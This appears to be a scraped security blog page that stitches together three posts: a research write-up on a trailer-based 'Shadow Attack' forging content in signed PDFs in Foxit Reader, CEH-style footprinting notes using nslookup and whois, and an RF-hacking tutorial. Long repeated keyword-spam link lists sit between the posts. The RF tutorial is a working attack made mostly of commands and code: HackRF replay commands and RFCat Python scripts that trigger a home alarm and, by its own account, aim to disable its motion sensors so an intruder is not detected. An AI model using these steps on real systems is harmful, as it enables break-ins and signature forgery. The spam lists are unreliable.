lunes, 5 de junio de 2023

Shadow Attacks … The Smallest Attack Vector Ever

In July 2020, we introduced a novel attack class called Shadow Attacks. In our recent research, we discovered a new variant of the attack which relies only on an Incremental Update containing a malicious trailer.
A proof-of-concept exploit working on Foxit (Version: 11.0.1.49938) can be downloaded here.

The story so far ...

Shadow attacks are attacks bypassing the integrity protection of digitally signed PDF documents. The attacks abuse two legitimate features in PDF documents which we briefly explain.

Hiding Content

In PDFs, there are multiple techniques to hide content that is not displayed when the document is opened. We, as attackers, usually hide malicious objects without referencing them in the xref section.

Incremental Updates

New content can be appended to a signed PDF document. This is quite dangerous though. The digital signature in PDFs protects a specific range of bytes. Any appended content does not break the signature verification since it is outside this range. As a result, any new Incremental Update does not violate the cryptographic verification of the digital signature. 
But, Incremental Updates are quite dangerous since they may completely change the displayed content of the document. In 2019, we showed different techniques based on Incremental Updates – the Incremental Saving Attacks.
As a countermeasure, most vendors warn if additional content is added after signing the document. BUT … not always!!!
 
There are meaningful use cases where Incremental Updates in digitally signed documents are allowed. For instance, contracts should be signed by multiple parties and each new signature is applied via additional Incremental Update.
Also, PAdES defines Incremental Updates as part of the long-term validation of digitally signed PDFs.
In summary, Incremental Updates are painful from a security perspective. Currently, vendors are trying to estimate whether an Incremental Update is malicious or not by analyzing its content.

Shadow Attacks

Shadow attacks, in general, deceive the PDF applications that an Incremental Update is not malicious. This can be done by providing an Incremental Update with minimal content.
In 2020, we estimated that appending an xref section and a trailer is sufficient to bypass the detection mechanisms of popular applications such as Adobe Reader and Foxit Reader.

Trailer-based Shadow Attack

Three months ago, we tried to reduce the content of the malicious Incremental Update. Our idea was to use only a malicious trailer and still change the content of the entire document when it is opened. Let's see how this can be done. 


The Signer's view on the document

 If a signer gets the document depicted on the left side, he or she sees the content "Sign the document to get a reward".
The document contains a hidden content depicted as red text – the 4 0 obj containing the text "You are fired. Get out immediately" and an xref section pointing to that object. However, the trailer references another xref section, see (1) and (2). Thus, the red text is never shown.
From the signer's perspective, there is no possibility to detect the hidden content by opening and reviewing the document.
As a result, the signer, for example the company director, signs the document.

The Victim's view on the document

We assume that the attacker receives the signed document and manipulates it.
The attacker appends only a trailer that points to the hidden malicious xref section (the red one). When the victim opens the document, the content "You are fired. Get out immediately" is shown.
However, the digital signature validation does not throw any warning since … well … what could go wrong if only a trailer is appended.
 

Honest vs. Malicious Trailer

There are small differences between the honest and the malicious trailer– the byte position of the xref section. Now, the trailer points to the hidden xref section.
trailer
<<
/Size 23
/Prev 18735
/Root 13 0 R
]>>
Honest trailer
trailer
<<
/Size 23
/Prev 19192
/Root 13 0 R
]>>
Malicious trailer
 
 



Impact and Exploit

We successfully applied the new attack on Foxit Reader (Version: 11.0.1.49938). We promptly reported the vulnerability and provided a Proof-of-Concept (PoC) exploit, known as CVE-2021-40326.
Foxit acknowledged the attack and published a security fix with the new version Foxit Reader 11.1.
 
We are not aware of any further implementations vulnerable to this attack.
If you think that your application might be vulnerable to the attack, then just download the exploit and test on your own.
 

Authors of this post

Vladislav Mladenov

Simon Rohlmann

Christian Mainka

Continue reading
  1. Pentest Tools For Android
  2. Pentest Automation Tools
  3. Nsa Hacker Tools
  4. Hacking Tools Hardware
  5. How To Make Hacking Tools
  6. Blackhat Hacker Tools
  7. Hacking Tools Software
  8. Hacker Tools Online
  9. Physical Pentest Tools
  10. Hacking Tools 2020
  11. Nsa Hack Tools
  12. Hack Tools
  13. Usb Pentest Tools
  14. Hacker Tools Free
  15. Hacking Tools Usb
  16. How To Make Hacking Tools
  17. Nsa Hack Tools Download
  18. Hacking Tools Online
  19. Hacking Tools Pc
  20. Pentest Tools Alternative
  21. Nsa Hack Tools
  22. Pentest Tools Url Fuzzer
  23. Pentest Tools Nmap
  24. Pentest Tools Website Vulnerability
  25. Hackrf Tools
  26. Hacker Tools 2019
  27. Pentest Tools Apk
  28. Free Pentest Tools For Windows
  29. Hacker Tools Online
  30. Hacker Search Tools
  31. Computer Hacker
  32. Hacking Tools For Windows
  33. Hacking Tools Hardware
  34. Pentest Tools For Windows
  35. Pentest Tools Website Vulnerability
  36. Pentest Tools Subdomain
  37. Hack Tools For Games
  38. Hacker Tools Linux
  39. Hacking Tools 2020
  40. Hacking Tools Usb
  41. Best Hacking Tools 2020
  42. Hack Tools Download
  43. Hacking Tools Pc
  44. Hacking Tools
  45. Ethical Hacker Tools
  46. Pentest Tools For Windows
  47. Pentest Tools Kali Linux
  48. Pentest Tools For Mac
  49. Hack Tools Mac
  50. Hacker Tool Kit
  51. Computer Hacker
  52. Tools 4 Hack
  53. Hacker Tools For Windows
  54. Kik Hack Tools
  55. Hack Tool Apk No Root
  56. Free Pentest Tools For Windows
  57. Hack Website Online Tool
  58. Hacker Tools For Ios
  59. How To Hack
  60. How To Install Pentest Tools In Ubuntu
  61. Pentest Tools Download
  62. Pentest Tools Windows
  63. Hacking Tools
  64. Hacker
  65. Hacking Tools Pc
  66. Hacker Tools Github
  67. How To Make Hacking Tools
  68. Hacking Tools 2019
  69. Hacking Tools Name
  70. Hackrf Tools
  71. Install Pentest Tools Ubuntu
  72. Hacking App
  73. Hak5 Tools
  74. Hacking Tools For Beginners
  75. Hacking Tools Hardware
  76. Hack App
  77. Hacking Tools For Windows Free Download
  78. Pentest Tools Find Subdomains
  79. Android Hack Tools Github
  80. Hacking Tools Software
  81. Android Hack Tools Github
  82. Hacking Tools For Beginners
  83. Tools For Hacker
  84. Hacking Tools Free Download
  85. Kik Hack Tools
  86. Pentest Tools Port Scanner
  87. Pentest Automation Tools
  88. Hacker Tools Linux
  89. Best Hacking Tools 2019
  90. Hackers Toolbox
  91. How To Make Hacking Tools
  92. Hack Tools
  93. Hacking Tools Name
  94. Hacker Tools Free Download
  95. Pentest Recon Tools
  96. Hacking Apps
  97. Hacking App
  98. New Hack Tools
  99. Pentest Tools Tcp Port Scanner
  100. Tools 4 Hack
  101. Underground Hacker Sites
  102. World No 1 Hacker Software
  103. Hacking Tools For Pc
  104. Hacking Tools Mac
  105. Pentest Tools Android
  106. Hacking Apps
  107. Blackhat Hacker Tools
  108. Hacking Tools For Mac
  109. Hacking Tools Pc
  110. Hacker Tools Github
  111. Beginner Hacker Tools
  112. Wifi Hacker Tools For Windows
  113. Pentest Tools Online
  114. Wifi Hacker Tools For Windows
  115. Hack Tools Download
  116. Hacking Tools Github
  117. Hacking Tools Name
  118. Pentest Box Tools Download
  119. Pentest Tools Website Vulnerability
  120. Hacking Tools
  121. Hacker Tools Linux
  122. Hacker Hardware Tools
  123. Pentest Tools Linux
  124. Hacking Tools For Windows Free Download
  125. Hacking Tools For Windows 7
  126. Tools 4 Hack
  127. Hacker Tools Windows
  128. Hackers Toolbox
  129. Pentest Tools Android
  130. Hack App
  131. Github Hacking Tools
  132. Hacking Tools For Kali Linux
  133. Hacker Tools Hardware
  134. Pentest Tools Download
  135. Hacker Security Tools
  136. Pentest Tools Website
  137. Hacking App
  138. Hacking Tools Name
  139. Pentest Tools For Android
  140. Underground Hacker Sites
  141. Hack And Tools
  142. Easy Hack Tools
  143. Hack Tools Online
  144. Hacker Tools Online
  145. Pentest Tools Free
  146. Pentest Recon Tools
  147. Hacker Tools For Pc
  148. Hack Tool Apk No Root
  149. Hacker Tools For Windows
  150. Hack Tool Apk
  151. Hack App
  152. Hacker
  153. Hacking Tools Github
  154. Nsa Hack Tools Download
  155. Hacking Tools For Mac
  156. How To Install Pentest Tools In Ubuntu
  157. Pentest Tools Nmap
  158. Pentest Tools Open Source
  159. Hacker Search Tools
  160. Pentest Tools Apk
  161. Best Pentesting Tools 2018
  162. Hacking Tools
  163. Pentest Tools Website
  164. Hack Rom Tools
  165. Pentest Tools Linux
  166. Pentest Tools For Mac
  167. Best Hacking Tools 2020
  168. Pentest Recon Tools
  169. Hacker Tools Hardware
  170. Hack Tools For Pc
  171. Pentest Tools For Android
  172. Pentest Tools For Android

CEH Practical: Information-Gathering Methodology

 

Information gathering can be broken into seven logical steps. Footprinting is performed during the first two steps of unearthing initial information and locating the network range.


Footprinting

Footprinting is defined as the process of establishing a scenario or creating a map of an organization's network and systems. Information gathering is also known as footprinting an organization. Footprinting is an important part of reconnaissance process which is typically used for collecting possible information about a targeted computer system or network. Active and Passive both could be Footprinting. The example of passive footprinting is assessment of a company's website, whereas attempting to gain access to sensitive information through social engineering is an example of active information gathering. Basically footprinting is the beginning step of hacker to get hacked someone because having information about targeted computer system is the main aspect of hacking. If you have an information about individual you wanna hack so you can easily hacked that individual. The basic purpose of information gathering is at least decide what type of attacks will be more suitable for the target. Here are some of the pieces of information to be gathered about a target
during footprinting:
  • Domain name
  • Network blocks
  • Network services and applications
  • System architecture
  • Intrusion detection system
  • Authentication mechanisms
  • Specific IP addresses
  • Access control mechanisms
  • Phone numbers
  • Contact addresses
Once this information is assemble, it can give a hacker better perception into the organization, where important information is stored, and how it can be accessed.

Footprinting Tools 

Footprinting can be done using hacking tools, either applications or websites, which allow the hacker to locate information passively. By using these footprinting tools, a hacker can gain some basic information on, or "footprint," the target. By first footprinting the target, a hacker can eliminate tools that will not work against the target systems or network. For example, if a graphics design firm uses all Macintosh computers, then all hacking software that targets Windows systems can be eliminated. Footprinting not only speeds up the hacking process by eliminating certain tool sets but also minimizes the chance of detection as fewer hacking attempts can be made by using the right tool for the job. Some of the common tools used for footprinting and information gathering are as follows:
  • Domain name lookup
  • Whois
  • NSlookup
  • Sam Spade
Before we discuss these tools, keep in mind that open source information can also yield a wealth of information about a target, such as phone numbers and addresses. Performing Whois requests, searching domain name system (DNS) tables, and using other lookup web tools are forms of open source footprinting. Most of this information is fairly easy to get and legal to obtain.

Footprinting a Target 

Footprinting is part of the preparatory pre-attack phase and involves accumulating data regarding a target's environment and architecture, usually for the purpose of finding ways to intrude into that environment. Footprinting can reveal system vulnerabilities and identify the ease with which they can be exploited. This is the easiest way for hackers to gather information about computer systems and the companies they belong to. The purpose of this preparatory phase is to learn as much as you can about a system, its remote access capabilities, its ports and services, and any specific aspects of its security.

DNS Enumeration

DNS enumeration is the process of locating all the DNS servers and their corresponding records for an organization. A company may have both internal and external DNS servers that can yield information such as usernames, computer names, and IP addresses of potential target systems.

NSlookup and DNSstuff

One powerful tool you should be familiar with is NSlookup (see Figure 2.2). This tool queries DNS servers for record information. It's included in Unix, Linux, and Windows operating systems. Hacking tools such as Sam Spade also include NSlookup tools. Building on the information gathered from Whois, you can use NSlookup to find additional IP addresses for servers and other hosts. Using the authoritative name server information from Whois ( AUTH1.NS.NYI.NET ), you can discover the IP address of the mail server.

Syntax

nslookup www.sitename.com
nslookup www.usociety4.com
Performing DNS Lookup
This search reveals all the alias records for www.google.com and the IP address of the web server. You can even discover all the name servers and associated IP addresses.

Understanding Whois and ARIN Lookups

Whois evolved from the Unix operating system, but it can now be found in many operating systems as well as in hacking toolkits and on the Internet. This tool identifies who has registered domain names used for email or websites. A uniform resource locator (URL), such as www.Microsoft.com , contains the domain name ( Microsoft.com ) and a hostname or alias ( www ).
The Internet Corporation for Assigned Names and Numbers (ICANN) requires registration of domain names to ensure that only a single company uses a specific domain name. The Whois tool queries the registration database to retrieve contact information about the individual or organization that holds a domain registration.

Using Whois

  • Go to the DNSStuff.com website and scroll down to the free tools at the bottom of the page.
  • Enter your target company URL in the WHOIS Lookup field and click the WHOIS button.
  • Examine the results and determine the following:
    • Registered address
    • Technical and DNS contacts
    • Contact email
    • Contact phone number
    • Expiration date
  • Visit the company website and see if the contact information from WHOIS matches up to any contact names, addresses, and email addresses listed on the website.
  • If so, use Google to search on the employee names or email addresses. You can learn the email naming convention used by the organization, and whether there is any information that should not be publicly available.

Syntax

whois sitename.com
whois usociety4.com

Read more

  1. Pentest Tools Apk
  2. Hack Website Online Tool
  3. Hacker Tools
  4. Hack App
  5. Hacking Tools Windows
  6. Hacking Tools For Mac
  7. Nsa Hack Tools
  8. Hacking Tools For Windows
  9. Hacking Tools Software
  10. World No 1 Hacker Software
  11. Tools For Hacker
  12. Hacking Tools For Mac
  13. Hack Tools Online
  14. Hack Tools
  15. Hacking Tools And Software
  16. Pentest Recon Tools
  17. Hacking Tools For Beginners
  18. Pentest Tools Port Scanner
  19. Usb Pentest Tools
  20. Hacking App
  21. Pentest Recon Tools
  22. Black Hat Hacker Tools
  23. Pentest Tools Find Subdomains
  24. Hacker Tools List
  25. Hacking Tools For Mac
  26. Blackhat Hacker Tools
  27. Hacker Tools Windows
  28. Hacking Tools For Games
  29. Pentest Tools For Windows
  30. Hacker Search Tools
  31. Pentest Box Tools Download
  32. Pentest Tools Subdomain
  33. Hack Tools Pc
  34. Pentest Tools Download
  35. Hack App
  36. Pentest Tools Free
  37. Hacking Tools Mac
  38. Hacker Tools 2020
  39. Hacker Tools For Windows
  40. Hacker Security Tools
  41. Hacker Tool Kit
  42. Hack Tools For Ubuntu
  43. Hacking Tools For Windows Free Download
  44. Hacking Tools
  45. Pentest Tools
  46. Hacker Tools Github
  47. World No 1 Hacker Software
  48. Hack Tools Pc
  49. Nsa Hack Tools
  50. Pentest Tools For Android
  51. Pentest Box Tools Download
  52. Hack Tools For Mac
  53. Hack Tools 2019
  54. Black Hat Hacker Tools
  55. Pentest Tools Tcp Port Scanner
  56. Pentest Tools Port Scanner
  57. Usb Pentest Tools
  58. Hacker Techniques Tools And Incident Handling
  59. Pentest Tools Windows
  60. Hack Tools For Ubuntu
  61. Pentest Automation Tools
  62. Hacker Tools Windows
  63. Pentest Tools Port Scanner
  64. Hacker Security Tools
  65. Nsa Hacker Tools
  66. Hacking Tools For Kali Linux
  67. Hacking Tools Download
  68. Hack Tools For Pc
  69. Hacking Tools Mac
  70. Hacking Tools Name
  71. Pentest Tools Open Source
  72. Computer Hacker
  73. Pentest Reporting Tools
  74. Hacker Tools Apk Download
  75. World No 1 Hacker Software
  76. Growth Hacker Tools
  77. Hacking Tools Name
  78. Pentest Tools Android
  79. Pentest Tools Bluekeep
  80. Hacking Tools 2020
  81. Hack Tools For Windows
  82. Hak5 Tools
  83. Tools 4 Hack
  84. Hack Tools Github
  85. How To Install Pentest Tools In Ubuntu
  86. Pentest Tools
  87. Hacker Search Tools
  88. Hacking Tools Windows 10
  89. Pentest Tools Url Fuzzer
  90. Hack Website Online Tool
  91. Hack Tools For Pc
  92. Pentest Tools For Android
  93. Best Pentesting Tools 2018
  94. Hacking Tools For Games
  95. Hacker Techniques Tools And Incident Handling
  96. Hacker Tools 2019
  97. Hacker Tools For Ios
  98. Hack Tools
  99. Hack Tools For Pc
  100. Hacking Tools For Windows 7
  101. Pentest Box Tools Download
  102. Hacker Tools 2019
  103. Pentest Tools Android
  104. Pentest Tools Online
  105. Github Hacking Tools
  106. Hacking Tools For Windows
  107. Hacking Tools Software
  108. Hacker Tools Online
  109. Pentest Automation Tools
  110. Hacking Tools For Mac
  111. Tools 4 Hack
  112. Pentest Tools For Windows
  113. Pentest Tools Website Vulnerability
  114. Pentest Tools Windows

domingo, 4 de junio de 2023

Hacking Everything With RF And Software Defined Radio - Part 1


This will be a Mini Course on Attacking Devices with RF from a hackers perspective


I wanted to learn about hacking devices using radio frequencies(RF) as their communication mechanism , so I looked around the Internet and only found a few scattered tutorials on random things which were either theoretical or narrowly focused. So I bought some hardware and some tools and decided to figure it out myself. The mission was to go from knowing nothing to owning whatever random devices I could find which offer up a good target with multiple avenues of attack and capability for learning.  The devices and tools needed are posted below. As we attack more devices, we will post more info on those devices.
You can follow us online at the following if your really bored:
Twitter: @Ficti0n , GarrGhar
Site: CCLabs.io


Items needed to Follow Along: 

Purchase Target: 

Home Alert System: https://goo.gl/W56Eau
I settled on hacking a home alert system for the first blog, which contained the following Items: 
  • A doorBell
  • Motion Sensors with alarm alerts
  • Door sensors to alert when the door is opened
  • Home Hub Receiver

Purchase Tools Needed: 

HackRF: https://goo.gl/3trM5Q
YardStick: https://goo.gl/wd88sr
RTL SDR: https://goo.gl/B5uUAR


Penetration Testing BrainStorming Session: 

I brainstormed with a friend the following attack avenues for this device: 
  • Ring the doorbell  (Our Hello World) 
  • Trigger the motion sensors
  • Remotely disable the motion sensors
  • Jam frequencies for Denial Of Service 

This blog will cover all of the attacks performed, including code, data captures, so you can follow along even if you don't have all of the exact devices but want to play around with it yourself. These are the the topics covered so you can decide if you want to read further or watch the associated videos linked below. 

  • Using HackRF for RF Replay attacks 
  • Using Yardstick One for Replay attacks 
  • Demodulating and decoding signals for use with RF attacks 
  • Discovering and troubleshooting issues
  • Coding tools in python and RFCat
  • RF Jamming Attacks


Video Series PlayList Associated with this blog: 




Initial Profiling of our Device: 

What does our device do in normal operation?   
Taking a look at all the components, there is a receiving station which sets off alarms based on opening doors, motion from a motion sensor and the pressing of a doorbell.  

How do they Connect?
All of these devices are only connected to each other via wireless, they are not connected to any sort of local network or wires. So they are all communicating in an unknown frequency we need determine before we can start hacking them. 

Determining the Frequency: 
To profile our device for the frequency its transmitting on we can use the FCID located on the back of any of the transmitters. We can do this by going to https://fccid.io/ and typing in the FCID from the back of our device. This will provide data sheets, and test reports which contain the information needed to sniff our devices radio transmissions. This site also contains internal device pictures which are useful if you wanted to try hardware hacking. For example looking for Integrated Circuits(IC) numbers or debug interfaces. In this case we only care about the RF frequencies our device is using which happens to be the 315MHz as show below from the fccid website. 




Replay attacks with HackRF To Trigger / Disable Sensors: 

Armed with the frequency range only and no other information we decided to see if we can just blindly capture and replay a transmissions raw form to perform actions without the legitimate transmitters and without understanding anything. 

Below is a photo of the HackRF One hardware used in the first attack and linked above. 


Install HackRF Software: 

Install on OS X for HackRF is as simple as using Brew install, on Linux use the package manager for your distro: 
  • brew install hackrf
  • Plug in HackRF and type hackrf_info to confirm its working

Our Hello World attack is a simple replay attack of a raw capture to perform a normal operation initiated by HackRF instead of the device. We can perform this attack without understanding anything about the capture and decoding of signals. 

With the HackRF device and 2 simple commands we will capture the transmission and then replay it as if it was from the initial device in its raw format.  The following 2 commands are listed below.  The -r is used to receive and the -t is used to transmit (RX, TX) you will also notice a -R on the transmit command which continuously repeats in TX mode denoted by "Input file end reached. Rewind to beginning" within the transmit output below. We use this in case the first transmission is not seen by the device. The other switches are for gain. 

Simple Replay Commands: 

hackrf_transfer -r connector.raw -f 315000000 -l 24 -g 20
hackrf_transfer -t connector.raw -f 315000000 -x 40 -R

By using these commands we can capture the motion sensor transmission and replay it in raw format to create a false alarm, we can also capture the doorbell transmission and trigger an alarm.  Output of the commands needed to do this are shown below. The video associated with this blog shows the audio and visual output from the alarm system as well as a video form of this blog.  

Receive: (Capture Traffic from HackRF): 

Destroy: ficti0n$ sudo hackrf_transfer -r connector.raw -f 315000000 -l 24 -g 20
call hackrf_set_sample_rate(10000000 Hz/10.000 MHz)
call hackrf_set_freq(315000000 Hz/315.000 MHz)
Stop with Ctrl-C
19.9 MiB / 1.005 sec = 19.8 MiB/second
20.2 MiB / 1.001 sec = 20.2 MiB/second
19.9 MiB / 1.004 sec = 19.9 MiB/second
20.2 MiB / 1.005 sec = 20.1 MiB/second
^CCaught signal 2
 5.2 MiB / 0.257 sec = 20.4 MiB/second

Exiting...
Total time: 4.27196 s
hackrf_stop_rx() done
hackrf_close() done
hackrf_exit() done
fclose(fd) done
exit

Transmit: (Trigger alarm from HackRF) 

Destroy: ficti0n$ sudo hackrf_transfer -t connector.raw -f 315000000 -x 40 -R
call hackrf_set_sample_rate(10000000 Hz/10.000 MHz)
call hackrf_set_freq(315000000 Hz/315.000 MHz)
Stop with Ctrl-C
19.9 MiB / 1.000 sec = 19.9 MiB/second
19.9 MiB / 1.005 sec = 19.8 MiB/second
20.2 MiB / 1.005 sec = 20.1 MiB/second
20.2 MiB / 1.000 sec = 20.2 MiB/second
Input file end reached. Rewind to beginning.
20.2 MiB / 1.005 sec = 20.1 MiB/second
20.2 MiB / 1.001 sec = 20.2 MiB/second
19.9 MiB / 1.005 sec = 19.8 MiB/second
20.2 MiB / 1.000 sec = 20.2 MiB/second
^CCaught signal 2
12.8 MiB / 0.654 sec = 19.7 MiB/second

Exiting...
Total time: 12.68557 s
hackrf_stop_tx() done
hackrf_close() done
hackrf_exit() done
fclose(fd) done
exit

While this is a good POC that we can communicate with the door alert system, this did not provide much of a learning opportunity nor did it drastically reduce the effectiveness of the security system. It only provides false alarms of standard functionality. Lets try doing this the more complicated way by profiling the device a bit more, capturing traffic, reducing the wave patterns to binary, converting to hex and then sending it over another device for a bit more precision and learning opportunity.  This will also open up other attack vectors. This sounds complicated, but honestly its not complicated just a bit tedious to get right at first. 

Further Profiling our Devices Functionality: 

We are easily able to replay functionality when initiating actions ourselves with our HackRF, but what else is going on with the radio transmissions? In order to monitor the transmissions in a very simple way we can use tools such as GQRX with either our HackRF device or an inexpensive SDR Dongle and view the 315MHz radio frequency to see whats happening. 

GQRX Install:

You can grab GQRX from the following location for OSX,  on linux whatever package manager your distro uses should be sufficient for installing GQRX: 

Plug in your SDR dongle of choice (HackRF or RTL-SDR, load up GQRX, and select your device, in this case a cheap 19 dollar RTL SDR: 





Select OK and the interface will load up, I made the following changes.

  • I changed the mode under receiver options on the right hand side to AM for Amplitude modulation.
  • I changed the MHz at the top to 315000000 since that is what we saw on the fccid.io data sheets. 
  • I then hit play and could view the 315 MHz frequency range. 

When triggering any of the transmit devices I saw a spike in the frequency close to the 315 MHz range.  I then held down the doorbell button since this transmit device would just keep replaying over and over while pressed. While this was repeating I dragged the bar to match the frequency exactly. Which was actually roughly 314.991.600 give or take. 



I then triggered the motion sensor and saw a similar spike in frequency, but I also noticed the motion sensor transmitter sends a 2nd transmission after about 6 seconds to shut off the light on the receiver hub that no more motion is happening. A little testing showed this  will disable the alarm from triggering during a limited time period.  

Can we replay the Motion Sensor Turn off?? 
I tried to repeat the simple replay attack of turning off the motion sensor with HackRF, however unless your capture timing is perfect to reduce any extra data the sensor disable is rather spotty and still sometimes triggers an alarm. Even with a short capture the raw file was 40mb in size. If you were to try to breach a building and disable its sensors there is a 50% chance or so the motion sensor will be triggered.  So this is not a sufficient method of disabling the motion sensor alarm. I only want a 100% chance of success if I was to try to bypass a security system.  So we need another technique.  I read online a bit and found something about decoding signal patterns into binary which sounded like a good way to reduce the extra data for a more reliable alarm bypass and decided to start with the simple doorbell as a test due to its ease of use, prior to working with less reliable transmissions based on motion and timing.  



Decoding Signal Patterns for Sending With The YardStick One: 

Below is a picture of the yard Stick tool used in the following attacks


Documented Process: 

Based on my online research in order to capture a signal and retransmit using a yardstick we need to do the following: 

  • Record the transmission with the SDR dongle and GQRX
  • Demodulate and Decode with Audacity into binary (1s & 0s)
  • Convert the Binary to Hex (0x)
  • Replay with YardStick in python and RFCat libraries 

Troubleshooting Extra Steps: 

However I found a few issues with this process and added a few more steps below. I am not trying to pretend everything worked perfectly. I ran into a few problems and these trouble shooting steps fixed the issues I ran into and I will list them below and explain them in this section as we walk through the process: 

  • Record your YardStick Replay with GQRX and adjust the frequency again based on output
  • Compare your transmission waveform to that of the original transmitters waveform to insure your 1's & 0's were calculated properly
  • Add some  padding in form of \x00 to the end of your Hex to make it work. 
  • Adjust the number of times you repeat your transmissions

Record Transmission with GQRX: 

OK so first things first, load your GQRX application and this time hit the record button at the bottom right side prior to triggering the doorbell transmitter. This will save a Wav file you can open in audacity. 

Install Audacity: 

You can download audacity at the following link for OSX as well as other platforms. http://www.audacityteam.org/download/  You should also be able to use your distro's package management to install this tool if it is not found on the site. 

If you open up your wav file and zoom in a little with Command+1 or the zoom icon you should start to see a repeating pattern similar to this: 



We need to decode one of these to trigger the doorbell. So we will need to zoom in a bit further to see a full representation of one of these patterns.  Once we zoom in a bit more we see the following output which is wave form representation of your transmission. The high points are your 1's and the low points are your 0's: 



Decode to binary: 

So the main issue here is how many 1's and how many 0's are in each peak or valley??   Originally I was thinking that it was something like the following formatted in 8 bit bytes, but this left over an extra 1 which seemed odd so I added 7 0's to make it fit correctly.  (Probably incorrect but hey it worked LOLs) 
10111000 10001011 10111000 10001000 10001011 10111011 10000000

What the above binary means is that the first high peek was One 1 in length, the first low peek was One 0 in length and the larger low and high's were Three 111s in length. This seemed reasonable based on how it looks.  

Try converting it yourself, does it look like my representation above? 

Convert to Hex:

In order to send this to the receiver device we will need to convert it to hex. We can convert this to hex easily online at the following URL: 

Or you can use radare2 and easily convert to hex by formatting your input into 8 bit byte segments followed by a "b" for binary as follows and it will spit out some hex values you can then use to reproduce the transmission with the yardstick: 

Destroy:~ ficti0n$ rax2 10111000b 10001011b 10111000b 10001000b 10001011b 10111011b 10000000b
0xb8
0x8b
0xb8
0x88
0x8b
0xbb
0x80

In order to send this with the YardStick you will need to use a python library by the name of RFCat which interfaces with your Yardstick device and can send your Hex data to your receiver.  We can easily do this with python. Even if you do not code it is very simple code to understand.  In order to install RFCat you can do the following on OSX:  (Linux procedures should be the same) 

Install RFCat and Dependencies(libusb, pyusb): 

git clone https://github.com/atlas0fd00m/rfcat.git
cd rfcat/
sudo python setup.py install
cd ../
git clone https://github.com/walac/pyusb.git
cd pyusb/
sudo python setup.py install
easy install pip
pip install libusb
Plug in your device and run the following to verify: 
rfcat -r


Setting up your python Replay Attack: 

First convert our hex from 0xB8 format to \xB8 format and place it in the following code:
Hex Conversion for the python script: 
\xb8\x8b\xb8\x88\x8b\xbb\x80

I provided a few notations under the code to help understanding but its mostly self explanatory: 

#--------Ring the doorbell--------#: 
from rflib import *

d = RfCat()   #1
d.setFreq(315005000)  #2
d.setMdmModulation(MOD_ASK_OOK) #3
d.setMdmDRate(4800) #4 

print "Starting"
d.RFxmit("\xb8\x8b\xb8\x88\x8b\xbb\x80"*10) #5
print 'Transmission Complete'

#--------End Code --------#
#1 Creating a RfCat instance
#2 Setting your Frequency to the capture range from your GQRX output
#3 Setting the modulation type to ASK Amplitude shift keying
#4 Setting your capture rate to that of your GQRX capture settings 
#5 Transmit your Hex 10 times

Ring Doorbell with Yardstick (First Attempt): 

Plug your YardStick into the USB port and run the above code. This will send over your command to ring the doorbell. 

Destroy:ficti0n$ python Door.py
Starting
Transmission Complete

However, this will fail and we have no indication as to why it failed. There are no program errors, or Rfcat errors. The only thing I could think is that that we sent the wrong data, meaning we incorrectly decoded the wave into binary. So I tried a bunch of different variations on the original for example the short lows having Two 1's instead of One and all of these failed when sending with the Yardstick. 


Doorbell with Yardstick (TroubleShooting): 

I needed a better way to figure out what was going on. One way to verify what you sent is to send it again with the Yardstick and capture it with your RTL-SDR device in GQRX. You can then compare the pattern we sent with the yardstick, to the original transmission pattern by the transmitter device. 

The first thing you will notice when we capture a Yardstick transmission is the output is missing the nice spacing between each transmission as there was in the original transmission. This output is all mashed together: 




If we keep zooming in we will see a repeating pattering like the following which is our 10 transmissions repeating over and over: 




If we keep zooming in further we can compare the output from the original capture to the new capture and you will notice it pretty much looks the same other then its hard to get the zoom levels exactly the same in the GUI: 






Hmmm ok so the pattern looks correct but the spacing between patterns is smashed together. After a bit of searching online I came across a piece of code which was unrelated to what I was trying to do but sending RF transmissions with \x00\x00\x00 padding at the end of the hex.  This makes sense in the context of our visual representation above being all mashed up. So I tried this and it still failed.  I then doubled it to 6 \x00's and the doorbell went off. So basically we just needed padding. 

Also I should note that you can put as much padding as you want at the end.. I tried as much as 12 \x00 padding elements and the doorbell still went off. I also then tried a few variations of my binary decoding and some of those which were slightly off actually rang the doorbell. So some variance is tolerated at least with this device.  Below is the working code :)   


Our Hello World test is a SUCCESS. But now we need to move on to something that could bypass the security of the device and cause real world issues. 

The following updated code will ring the doorbell using padding: 
#--------Ring the doorbell--------#: 
from rflib import *

d = RfCat()
d.setFreq(315005000)
d.setMdmModulation(MOD_ASK_OOK)
d.setMdmDRate(4800)

print ("Starting Transmission")
d.RFxmit("\xb8\x8b\xb8\x88\x8b\xbb\x80\x00\x00\x00\x00\x00\x00"*10)
print ("Transmission Complete")
#--------End Code --------#


Disable the Motion Sensor with No Motion Feature:

Ok so originally our simple HackRF replay had about a 50% success rate on turning off the motion sensor due to extraneous data in the transmission replay and timing issues. Lets see if we can get that to 100% with what we learned about decoding from the doorbell. We will instead decode the signal pattern sent from the transmitter to the receiver when shutting off the alert light, but without extra data. We will send it directly with a Yardstick over and over again and potentially use the devices own functionality to disable itself. This would allow us to walk past the motion sensors without setting off an alert. 
The question is can we take the transmission from the Motion Sensor to the Receiver Hub which says motion has ended and use that to disable the Motion Sensor based on a slight delay between saying "there is no motion" and being ready to alert again and bypass the motion sensors security.  Lets give it a try by capturing the "motion has ended" transmission with GQRX when the motion sensor sends its packet to the receiver 6 seconds after initial alert and decode the pattern.. 

Below is a screenshot of the "Motion has ended) transmission in audacity: 



So this sequence was a bit different, there was an opening sequence followed by a repeating sequence.  Lets decode both of these patterns and then determine what we need to send in order to affect the devices motion turnoff functionality.  Below is the zoomed in version of the opening sequence and repeating sequence followed by an estimation of what I think the conversion is. 




The opening sequence appears to have all the highs in single 1's format and most of the lows in 3 000's format, below is the exact conversion that I came up with adding some 0's at the end to make the correct byte length… 

See what you can come up with,  does it match what I have below? 

10001000 10100010 10001010 00101000 10101000 10001010 00101000 10100000

If we convert that to hex we get the following: 
Destroy:ficti0n$ rax2 10001000b 10100010b 10001010b 00101000b 10101000b 10001010b 00101000b 10100000b
0x88
0xa2
0x8a
0x28
0xa8
0x8a
0x28
0xa0

Hex Conversion for the python script: 
\x88\xa2\x8a\x28\xa8\x8a\x28\xa0


Next up is our repeating pattern which has a similar but slightly different structure then the opening pattern. This one starts with a 101 instead of 1000 but still seems to have all of its 1's in single representations and most of its lows in sets of 3 000's. Below the screenshot is the the binary I came up with.. Write it out and see if you get the same thing? 




Repeating Pattern:
10100010 10100010 10001000 10100010 10001010 00101000 10101000 10100010 10001010 00101000

Hex Conversion:  (Used the online tool, R2 didn't like this binary for some reason) 
\xA2\xA2\x88\xA2\x8A\x28\xA8\xA2\x8A\x28

